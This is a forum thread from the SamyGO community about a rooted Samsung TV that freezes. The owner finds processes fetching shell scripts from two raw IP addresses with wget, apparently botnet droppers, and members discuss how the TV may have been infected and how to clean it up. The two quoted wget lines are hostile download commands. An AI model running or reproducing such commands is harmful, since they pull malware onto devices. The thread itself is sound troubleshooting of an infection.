Do i have a bot on TV?

General Forum for talking area for E series TVs.
Post Reply

User avatar
fluffi444
SamyGO Project Donor
Posts: 568
Joined: Fri Apr 05, 2013 9:55 pm
Location: Germany

Do i have a bot on TV?

Post by fluffi444 »

Hey Folks...

since some weeks my TV startet do freeze when it was on for a longer time and I opend the SmartHub.
I searched long time to find why. I disabled all SamyGO init.d injections which are not absolutly needed...
(like 01_01_catch_crap.init, 02_04_vusb.init. etc)... It become better but not solved...
Then I used SSH with "top" command to see what could be the reason and saw that TV has low free RAM ...

Then I saw am running command which looks very strange to me:

wget http://104.238.145.221/Sharky/gb.sh
wget http://142.4.195.165/lel.sh

Short google said me that this is or could be an bot:
https://beesandbirdsandthings.wordpress ... bots-bots/
This IP was repoerted to do Hacking, FTP Brute-force
http://www.abuseipdb.com/report-history/104.238.145.221

Any suggestions from the professionals?
Bild1.png
You do not have the required permissions to view the files attached to this post.
TV: UE40ES7000 @ UE40ES8090 - T-ECPDEUC-2022.0 // SamyGO
CI+: Unicam EVO 4 with HD+ (HD02) @ Pacific 4.60
NET: Samba: PC
User avatar
juusso
SamyGO Moderator
Posts: 10129
Joined: Sun Mar 07, 2010 6:20 pm

Re: Do i have a bot on TV?

Post by juusso »

This is completely new for me and id say i never seen this befor. I'm 200 per cent sure we do not include any such kind of "tasks" in our rooting images. But possible here is some activity of someone who could try to infect rooted tv's by injecting suspicious code via third party apps which you installed after you have got root. Coould you remember widgets you did install? Probably we also should inspect your rooting image. Same way we do rooting, intruders can organise hacking via custom widgets.
Third possibility - if you are in local network and it is not secure, someone could setle that code from inside your local network. In any cases this is warning for us.
LE40B653T5W,UE40D6750,UE65Q8C
Have questions? Read SamyGO Wiki, Search on forum first!
FFB (v0.8), FFB for CI+ . Get root on: C series, D series, E series, F series, H series. rooting K series, exeDSP/exeTV patches[C/D/E/F/H]

DO NOT EVER INSTALL FIRMWARE UPGRADE
User avatar
fluffi444
SamyGO Project Donor
Posts: 568
Joined: Fri Apr 05, 2013 9:55 pm
Location: Germany

Re: Do i have a bot on TV?

Post by fluffi444 »

Thank you, Juusso for your comment! Actually I never thought that this was from SamyGO at all...
Yes- there is an Widget I installed... Besides this TV is very plain and quite all of user apps (from Sammy) are deinstalled.

This app is/was SS IPTV - http://ss-iptv.com/en/ - I removed it now..
Then I have PLEX - But I don't thing that this very famous app could be responsible... actually...

As far as I understand those commands we started but not finished, am I right?
Because I saw those command the whole time - Iried also to download those *.sh and ping both IPs - both without "sucsess".
Looks like nothing bad happens here...

Anyway - after I rebootet TV, and giving Router new IP I never saw one of those wget again...
I also did an reset of smarthub...

Will keep an eye on it...
TV: UE40ES7000 @ UE40ES8090 - T-ECPDEUC-2022.0 // SamyGO
CI+: Unicam EVO 4 with HD+ (HD02) @ Pacific 4.60
NET: Samba: PC

Post Reply

Return to “[E] General”